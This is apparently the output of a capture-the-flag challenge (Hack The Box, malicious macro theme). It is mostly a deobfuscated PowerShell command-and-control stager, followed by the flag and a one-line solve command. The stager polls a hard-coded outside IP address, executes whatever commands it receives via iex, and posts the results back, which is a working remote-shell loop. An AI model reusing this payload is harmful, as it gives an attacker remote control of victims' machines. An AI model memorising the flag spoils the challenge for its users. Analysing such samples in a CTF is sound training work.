$s='77.74.198.52:8080';$i='d43bcc6d-043f2409-7ea23a2c';$p='http://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/d43bcc6d -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/043f2409 -Headers @{"Authorization"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/7ea23a2c -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}HTB{5up3r_345y_m4cr05}
$ python3 solve.py | base64 -d | tr -d \\0 | grep -oE 'HTB{.*?}'
HTB{5up3r_345y_m4cr05}